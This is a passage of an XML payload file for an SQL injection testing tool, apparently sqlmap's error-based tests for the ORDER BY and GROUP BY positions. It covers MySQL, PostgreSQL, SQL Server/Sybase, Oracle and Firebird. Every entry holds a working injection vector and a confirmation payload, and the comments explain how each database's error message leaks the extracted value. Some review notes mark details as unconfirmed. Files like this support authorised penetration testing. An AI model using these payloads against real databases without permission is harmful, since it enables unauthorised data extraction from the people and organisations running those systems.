(verify on the target).
-->
<title > MySQL > = 5.5 error-based - ORDER BY, GROUP BY clause (EXP)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s)</vector>
<request >
<payload > ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<!--
MySQL 5.7.8+, ORDER BY / GROUP BY position. The appended scalar subquery calls
JSON_KEYS() on text that is not valid JSON; the "Invalid JSON text" error echoes the
offending string and thus the delimited value. CONVERT(... USING utf8) fixes the
character set of the echoed text.
-->
<title > MySQL > = 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x)</vector>
<request >
<payload > ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.7.8</dbms_version>
</details>
</test>
<test >
<!--
MySQL, ORDER BY / GROUP BY position, FLOOR(RAND(0)*2) duplicate-key technique. The
seeded RAND makes the GROUP BY key collide and the "Duplicate entry ... for key" error
echoes the key containing the delimited value; INFORMATION_SCHEMA.PLUGINS supplies the
three-plus rows the collision needs.
NOTE(review): the <vector> selects the constant 1 while the confirmation <payload>
selects [RANDNUM]; the parameter-replace FLOOR test uses [RANDNUM] in both. Harmless
for the error itself, but the two should probably agree (confirm). Also, the PLUGINS
table presumably requires 5.1, not the declared 5.0.
-->
<title > MySQL > = 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
<request >
<payload > ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
<!--
MySQL 5.1+, ORDER BY / GROUP BY position. EXTRACTVALUE() with an XPath expression that
starts with '\' is malformed; the XPath syntax error echoes the expression including
the delimited value. No subquery wrapper is needed because the function call is itself
a valid sort/group expression. Error text is truncated (about 32 characters), limiting
the bytes recovered per request (confirm).
-->
<title > MySQL > = 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request >
<payload > ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<!--
MySQL 5.1+, ORDER BY / GROUP BY position. UPDATEXML() with an XPath expression that
starts with '.' followed by the delimiters is malformed; the XPath syntax error echoes
it. [RANDNUM]/[RANDNUM1] are throwaway XML-fragment and replacement arguments. Error
text is truncated (about 32 characters), so only a short window of the value comes
back per request (confirm).
-->
<title > MySQL > = 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request >
<payload > ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<!--
MySQL 4.1+, ORDER BY / GROUP BY position, FLOOR(RAND(0)*2) duplicate-key technique
without any INFORMATION_SCHEMA dependency: a four-row UNION derived table
([RANDNUM2]..[RANDNUM5]) supplies the rows the key collision needs, so it works on
servers older than 5.x. ROW([RANDNUM],[RANDNUM1]) > (two-column subquery) is a row
comparison that forces the grouped subquery to be evaluated in a scalar position; the
"Duplicate entry ... for key" error then echoes the delimited value. Lowest level of
the MySQL ORDER BY / GROUP BY tests because it is the most portable.
-->
<title > MySQL > = 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</vector>
<request >
<payload > ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
</details>
</test>
<test >
<!--
PostgreSQL, ORDER BY / GROUP BY position. The appended CAST(... AS NUMERIC) fails on
the non-numeric delimited text with "invalid input syntax for type numeric", and the
message quotes the input, so the value is echoed. ::text keeps the concatenation
type-correct whatever [QUERY] returns.
-->
<title > PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<!--
PostgreSQL, ORDER BY / GROUP BY position, alternative confirmation payload. Same
CAST(... AS NUMERIC) echo as the plain PostgreSQL ORDER BY / GROUP BY test; the
confirmation uses GENERATE_SERIES whose step is 1 when the condition holds (one row,
cast error echoes "1") and 0 otherwise (GENERATE_SERIES errors out before the
delimiters are printed). Fallback only, hence level 5.
-->
<title > PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<!--
Microsoft SQL Server / Sybase, ORDER BY position only (clause 3). The appended
(SELECT [RANDNUM] WHERE ...) is a FROM-less scalar subquery, which SQL Server accepts
in ORDER BY; its WHERE forces CONVERT(INT, ...) on the delimited text, and the
"Conversion failed when converting the varchar value ..." error echoes it. The string
literals '1'/'0' in the confirmation keep the concatenation varchar.
-->
<title > Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 3</clause>
<where > 1</where>
<vector > ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
<request >
<payload > ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<!--
Oracle, ORDER BY / GROUP BY position, XMLType technique: the appended scalar subquery
builds "<:" ... ">" around the delimited value, which is not a well-formed element, and
the XMLType() parsing error echoes the text. Spaces, '$' and '@' are replaced by
placeholder tokens first.
NOTE(review): unlike the WHERE/HAVING AND variant, '#' is not replaced here
([HASH_REPLACE]), so values containing '#' may come back truncated. Confirm.
-->
<title > Oracle error-based - ORDER BY, GROUP BY clause</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request >
<payload > ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<!--
Firebird, ORDER BY / GROUP BY position: the appended subquery compares the integer
[RANDNUM] with the delimited text, and the failed string-to-integer conversion echoes
it.
NOTE(review): the <title> says "ORDER BY clause" but <clause> is 2,3 (GROUP BY as
well), unlike the PostgreSQL and Oracle entries whose titles list both; align one with
the other. As with the Firebird parameter-replace test, the outer SELECT has no FROM
clause and puts a comparison in the select list; confirm it parses on the Firebird
versions in scope.
-->
<title > Firebird error-based - ORDER BY clause</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
<request >
<payload > ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
<!--
TODO: if possible, add payload for SQLite, Microsoft Access
and SAP MaxDB - no known techniques at this time
-->
<!-- End of error - based tests - ORDER BY, GROUP BY clause -->
</root>